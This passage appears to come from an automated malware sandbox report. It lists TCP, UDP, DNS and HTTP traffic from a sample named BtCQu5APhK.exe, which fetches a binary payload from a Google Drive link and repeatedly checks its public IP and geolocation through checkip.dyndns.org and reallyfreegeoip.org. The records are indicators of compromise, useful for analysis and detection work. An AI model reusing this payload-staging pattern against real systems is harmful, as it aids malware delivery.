Mar 7, 2025 23:01:13.514347076 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.514394999 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.514453888 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.514503956 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.514547110 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.514594078 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.515733957 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.515810013 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.515835047 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.515882969 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.517079115 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.517127037 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.517165899 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.517230988 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.517254114 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.517306089 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.522077084 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.522152901 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.522166014 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.522218943 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.522284031 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.522341013 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.541126013 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.541157961 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.541172981 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.541207075 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:14.616823912 CET	49690	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:14.621906042 CET	80	49690	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:14.621994019 CET	49690	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:14.622208118 CET	49690	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:14.627206087 CET	80	49690	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:15.267038107 CET	80	49690	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:15.272387028 CET	49690	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:15.277403116 CET	80	49690	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:15.505311012 CET	80	49690	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:15.548465014 CET	49690	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:15.970109940 CET	49691	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:15.970139027 CET	443	49691	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:15.970205069 CET	49691	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:15.986109018 CET	49691	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:15.986125946 CET	443	49691	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:17.660160065 CET	443	49691	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:17.660299063 CET	49691	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:17.663805008 CET	49691	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:17.663816929 CET	443	49691	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:17.664263010 CET	443	49691	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:17.667915106 CET	49691	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:17.708328962 CET	443	49691	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:18.138622999 CET	443	49691	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:18.138721943 CET	443	49691	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:18.138876915 CET	49691	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:18.145621061 CET	49691	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:18.151107073 CET	49690	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:18.156222105 CET	80	49690	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:18.343739986 CET	80	49690	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:18.355174065 CET	49692	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:18.355217934 CET	443	49692	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:18.355319023 CET	49692	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:18.355602980 CET	49692	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:18.355618000 CET	443	49692	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:18.392258883 CET	49690	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:20.037545919 CET	443	49692	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:20.040910959 CET	49692	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:20.040930033 CET	443	49692	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:20.495373011 CET	443	49692	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:20.495537996 CET	443	49692	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:20.495611906 CET	49692	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:20.495973110 CET	49692	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:20.499577999 CET	49690	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:20.500686884 CET	49693	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:20.505225897 CET	80	49690	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:20.505296946 CET	49690	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:20.505798101 CET	80	49693	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:20.505877018 CET	49693	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:20.505976915 CET	49693	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:20.511550903 CET	80	49693	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:21.151809931 CET	80	49693	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:21.153300047 CET	49694	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:21.153369904 CET	443	49694	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:21.153534889 CET	49694	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:21.153723955 CET	49694	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:21.153744936 CET	443	49694	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:21.204732895 CET	49693	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:22.860753059 CET	443	49694	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:22.862401962 CET	49694	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:22.862422943 CET	443	49694	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:23.435234070 CET	443	49694	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:23.435311079 CET	443	49694	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:23.435389042 CET	49694	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:23.436036110 CET	49694	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:23.441142082 CET	49695	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:23.446213007 CET	80	49695	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:23.446340084 CET	49695	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:23.446413994 CET	49695	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:23.451438904 CET	80	49695	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:24.090101004 CET	80	49695	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:24.091651917 CET	49696	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:24.091697931 CET	443	49696	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:24.091778040 CET	49696	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:24.092052937 CET	49696	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:24.092070103 CET	443	49696	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:24.142153978 CET	49695	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:25.794125080 CET	443	49696	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:25.797005892 CET	49696	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:25.797023058 CET	443	49696	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:26.301863909 CET	443	49696	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:26.301944971 CET	443	49696	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:26.302311897 CET	49696	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:26.302995920 CET	49696	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:26.310846090 CET	49695	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:26.311953068 CET	49697	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:26.316086054 CET	80	49695	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:26.316951990 CET	80	49697	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:26.317024946 CET	49695	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:26.317056894 CET	49697	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:26.317178965 CET	49697	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:26.322225094 CET	80	49697	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:26.973820925 CET	80	49697	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:26.975218058 CET	49698	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:26.975352049 CET	443	49698	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:26.975483894 CET	49698	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:26.975773096 CET	49698	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:26.975809097 CET	443	49698	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:27.017177105 CET	49697	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:28.799516916 CET	443	49698	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:28.845278978 CET	49698	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:30.701272011 CET	49698	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:30.701358080 CET	443	49698	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:31.340948105 CET	443	49698	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:31.341042995 CET	443	49698	104.21.80.1	192.168.2.7
Mar 7, 2025 23:01:31.341202021 CET	49698	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:31.341538906 CET	49698	443	192.168.2.7	104.21.80.1
Mar 7, 2025 23:01:31.344453096 CET	49697	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:31.345396042 CET	49699	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:31.349733114 CET	80	49697	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:31.349781036 CET	49697	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:31.350502014 CET	80	49699	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:31.350569010 CET	49699	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:31.350621939 CET	49699	80	192.168.2.7	193.122.6.168
Mar 7, 2025 23:01:31.355721951 CET	80	49699	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:32.002465963 CET	80	49699	193.122.6.168	192.168.2.7
Mar 7, 2025 23:01:32.048345089 CET	49699	80	192.168.2.7	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 23:01:05.262655020 CET	55737	53	192.168.2.7	1.1.1.1
Mar 7, 2025 23:01:05.325784922 CET	53	55737	1.1.1.1	192.168.2.7
Mar 7, 2025 23:01:08.269037962 CET	61662	53	192.168.2.7	1.1.1.1
Mar 7, 2025 23:01:08.276118040 CET	53	61662	1.1.1.1	192.168.2.7
Mar 7, 2025 23:01:14.604863882 CET	52364	53	192.168.2.7	1.1.1.1
Mar 7, 2025 23:01:14.612631083 CET	53	52364	1.1.1.1	192.168.2.7
Mar 7, 2025 23:01:15.957664013 CET	55040	53	192.168.2.7	1.1.1.1
Mar 7, 2025 23:01:15.966588974 CET	53	55040	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 23:01:05.262655020 CET	192.168.2.7	1.1.1.1	0xbc53	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:08.269037962 CET	192.168.2.7	1.1.1.1	0x3d7f	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:14.604863882 CET	192.168.2.7	1.1.1.1	0x811d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:15.957664013 CET	192.168.2.7	1.1.1.1	0x65de	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 23:01:05.325784922 CET	1.1.1.1	192.168.2.7	0xbc53	No error (0)	drive.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:08.276118040 CET	1.1.1.1	192.168.2.7	0x3d7f	No error (0)	drive.usercontent.google.com		172.217.16.193	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:14.612631083 CET	1.1.1.1	192.168.2.7	0x811d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 7, 2025 23:01:14.612631083 CET	1.1.1.1	192.168.2.7	0x811d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:14.612631083 CET	1.1.1.1	192.168.2.7	0x811d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:14.612631083 CET	1.1.1.1	192.168.2.7	0x811d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:14.612631083 CET	1.1.1.1	192.168.2.7	0x811d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:14.612631083 CET	1.1.1.1	192.168.2.7	0x811d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:15.966588974 CET	1.1.1.1	192.168.2.7	0x65de	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:15.966588974 CET	1.1.1.1	192.168.2.7	0x65de	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:15.966588974 CET	1.1.1.1	192.168.2.7	0x65de	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:15.966588974 CET	1.1.1.1	192.168.2.7	0x65de	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:15.966588974 CET	1.1.1.1	192.168.2.7	0x65de	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:15.966588974 CET	1.1.1.1	192.168.2.7	0x65de	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 23:01:15.966588974 CET	1.1.1.1	192.168.2.7	0x65de	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49690	193.122.6.168	80	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 23:01:14.622208118 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 23:01:15.267038107 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 23:01:15.272387028 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 23:01:15.505311012 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 23:01:18.151107073 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 23:01:18.343739986 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49693	193.122.6.168	80	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 23:01:20.505976915 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 7, 2025 23:01:21.151809931 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49695	193.122.6.168	80	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 23:01:23.446413994 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 23:01:24.090101004 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49697	193.122.6.168	80	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 23:01:26.317178965 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 23:01:26.973820925 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.7	49699	193.122.6.168	80

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 23:01:31.350621939 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 7, 2025 23:01:32.002465963 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 22:01:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49688	142.250.184.206	443	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 22:01:07 UTC	216	OUT	GET /uc?export=download&id=1wMNoy5ewjmQqnlz-9RLUqccKg7UuxNFj HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Cache-Control: no-cache
2025-03-07 22:01:08 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 07 Mar 2025 22:01:07 GMT Location: https://drive.usercontent.google.com/download?id=1wMNoy5ewjmQqnlz-9RLUqccKg7UuxNFj&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-6bGVX6JlEeS4UeElGrrURA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49689	172.217.16.193	443	2760	C:\Users\user\Desktop\BtCQu5APhK.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 22:01:10 UTC	258	OUT	GET /download?id=1wMNoy5ewjmQqnlz-9RLUqccKg7UuxNFj&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-03-07 22:01:12 UTC	5014	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AKDAyIuqygzU_pHEuwZPpubDlG7bLimt4ifm2-z8kCEE7JOrg7-dv9yziN_Htl8nfV2hL18 Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="EdwQuSDbauaQG74.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 274496 Last-Modified: Sun, 09 Feb 